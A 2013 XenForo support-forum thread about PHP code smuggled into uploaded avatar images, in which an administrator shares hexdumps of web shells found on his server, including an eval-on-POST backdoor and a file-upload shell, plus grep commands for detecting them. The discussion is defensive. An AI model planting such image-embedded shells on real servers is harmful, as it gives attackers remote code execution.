1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Lack of Interest Uploaded Image Security

Discussion in 'Closed Suggestions' started by |Jordan|, Mar 23, 2013.

  1. |Jordan|

    |Jordan| Active Member

    Uploaded images (either from attachments or avatars) should be secured (to prevent this exploit). It would also be great if uploaded avatars that are animated could be allowed to animate.
     
  2. Chris D

    Chris D XenForo Developer Staff Member

    On the first one, this has been dealt with in XenForo 1.1.4 which is due for release shortly. I actually have an image that has PHP code embedded into it.

    When I try to upload it:

    XenForo Community - Error
    The uploaded image contains invalid content. Please upload a different image.

    In terms of the latter error, this is a server configuration issue. Resizing animated images requires the ImageMagick library to be installed in the server, and to be enabled in the Admin CP.
     
  3. Mike

    Mike XenForo Developer Staff Member

    The first one is sort of unrelated to your server config issue, Chris. It's about a stupid upload script. :)
     
    Chris D likes this.
  4. Kent

    Kent Active Member

    GD doesn't support animation, but ImageMagick does.


    Out of curiosity I scanned my avatar directory and found 4 avatars with PHP in them, but no sign of a successful exploit.

    Code:
    000002b0  ff d9 3c 3f 70 68 70 20  40 65 76 61 6c 28 24 5f  |..<?php @eval($_|
    000002c0  50 4f 53 54 5b 27 39 27  5d 29 3b 3f 3e 1a        |POST['9']);?>.|
    Code:
    000037e0  ff d9 3c 3f 70 68 70 20  70 68 70 69 6e 66 6f 28  |..<?php phpinfo(|
    000037f0  29 3b 3f 3e                                       |);?>|
    Code:
    000005e0  00 00 00 49 45 4e 44 ae  42 60 82 3c 3f 70 68 70  |...IEND.B`.<?php|
    000005f0  20 65 63 68 6f 20 27 3c  62 3e 3c 62 72 3e 3c 63  | echo '<b><br><c|
    00000600  65 6e 74 65 72 3e 3c 66  6f 6e 74 20 63 6f 6c 6f  |enter><font colo|
    00000610  72 3a 22 62 6c 75 65 22  3e 3c 73 70 61 6e 20 73  |r:"blue"><span s|
    00000620  74 79 6c 65 3d 22 66 6f  6e 74 2d 66 61 6d 69 6c  |tyle="font-famil|
    00000630  79 3a 20 6d 6f 6e 6f 73  70 61 63 65 3b 22 3e 3c  |y: monospace;"><|
    00000640  73 70 61 6e 20 73 74 79  6c 65 3d 22 63 6f 6c 6f  |span style="colo|
    00000650  72 3a 20 72 67 62 28 32  35 35 2c 20 32 35 35 2c  |r: rgb(255, 255,|
    00000660  20 32 35 35 29 3b 22 3e  6f 3c 2f 73 70 61 6e 3e  | 255);">o</span>|
    00000670  3c 62 72 3e 3c 62 72 3e  27 2e 70 68 70 5f 75 6e  |<br><br>'.php_un|
    00000680  61 6d 65 28 29 2e 27 3c  62 72 3e 3c 2f 62 3e 27  |ame().'<br></b>'|
    00000690  3b 20 65 63 68 6f 20 27  3c 66 6f 72 6d 20 61 63  |; echo '<form ac|
    000006a0  74 69 6f 6e 3d 22 22 20  6d 65 74 68 6f 64 3d 22  |tion="" method="|
    000006b0  70 6f 73 74 22 20 65 6e  63 74 79 70 65 3d 22 6d  |post" enctype="m|
    000006c0  75 6c 74 69 70 61 72 74  2f 66 6f 72 6d 2d 64 61  |ultipart/form-da|
    000006d0  74 61 22 20 6e 61 6d 65  3d 22 75 70 6c 6f 61 64  |ta" name="upload|
    000006e0  65 72 22 20 69 64 3d 22  75 70 6c 6f 61 64 65 72  |er" id="uploader|
    000006f0  22 3e 27 3b 20 65 63 68  6f 20 27 3c 69 6e 70 75  |">'; echo '<inpu|
    00000700  74 20 74 79 70 65 3d 22  66 69 6c 65 22 20 6e 61  |t type="file" na|
    00000710  6d 65 3d 22 66 69 6c 65  22 20 73 69 7a 65 3d 22  |me="file" size="|
    00000720  35 30 22 3e 3c 69 6e 70  75 74 20 6e 61 6d 65 3d  |50"><input name=|
    00000730  22 5f 75 70 6c 22 20 74  79 70 65 3d 22 73 75 62  |"_upl" type="sub|
    00000740  6d 69 74 22 20 69 64 3d  22 5f 75 70 6c 22 20 76  |mit" id="_upl" v|
    00000750  61 6c 75 65 3d 22 55 70  6c 6f 61 64 22 3e 3c 2f  |alue="Upload"></|
    00000760  66 6f 72 6d 3e 27 3b 20  69 66 28 20 24 5f 50 4f  |form>'; if( $_PO|
    00000770  53 54 5b 27 5f 75 70 6c  27 5d 20 3d 3d 20 22 55  |ST['_upl'] == "U|
    00000780  70 6c 6f 61 64 22 20 29  20 7b 20 69 66 28 40 63  |pload" ) { if(@c|
    00000790  6f 70 79 28 24 5f 46 49  4c 45 53 5b 27 66 69 6c  |opy($_FILES['fil|
    000007a0  65 27 5d 5b 27 74 6d 70  5f 6e 61 6d 65 27 5d 2c  |e']['tmp_name'],|
    000007b0  20 24 5f 46 49 4c 45 53  5b 27 66 69 6c 65 27 5d  | $_FILES['file']|
    000007c0  5b 27 6e 61 6d 65 27 5d  29 29 20 7b 20 65 63 68  |['name'])) { ech|
    000007d0  6f 20 27 3c 62 3e 53 75  63 63 65 73 73 3c 2f 62  |o '<b>Success</b|
    000007e0  3e 3c 62 72 3e 3c 62 72  3e 27 3b 20 7d 20 65 6c  |><br><br>'; } el|
    000007f0  73 65 20 7b 20 65 63 68  6f 20 27 3c 62 3e 6e 3c  |se { echo '<b>n<|
    00000800  2f 62 3e 3c 62 72 3e 3c  62 72 3e 3c 2f 66 6f 6e  |/b><br><br></fon|
    00000810  74 3e 27 3b 20 7d 20 7d  20 3f 3e 3c 3f 70 68 70  |t>'; } } ?><?php|
    00000820  20 65 63 68 6f 20 70 68  70 69 6e 66 6f 28 29 3b  | echo phpinfo();|
    Code:
    000002c0  8a 28 a0 0f ff d9 3c 3f  70 68 70 20 40 65 76 61  |.(....<?php @eva|
    000002d0  6c 28 24 5f 50 4f 53 54  5b 27 39 27 5d 29 3b 3f  |l($_POST['9']);?|
    000002e0  3e 1a                                             |>.|
     
  5. Ingenious

    Ingenious Well-Known Member

    Kent what do you use to scan your images like this, and is it something all admins should be doing from time to time? Or can we safely assume any PHP within image files is not a threat?
     
  6. Kent

    Kent Active Member

    Incorrect configuration would allow someone to execute those files as PHP, common with Nginx.
    You probably won't have to worry about it.

    To scan, I used grep:
    grep -r '<?php' data/avatars/ >> baddies.txt
    grep -r '<?php' data/attachments/ >> baddies.txt

    And then hexdump to find the code:
    cat data/avatars/l/1/1000.jpg | hd
     
    Ingenious likes this.
  7. |Jordan|

    |Jordan| Active Member

    So will there be a fix to prevent this type of exploit?

    What about Abyss Web Server? (its like IIS but more secure)
     

Share This Page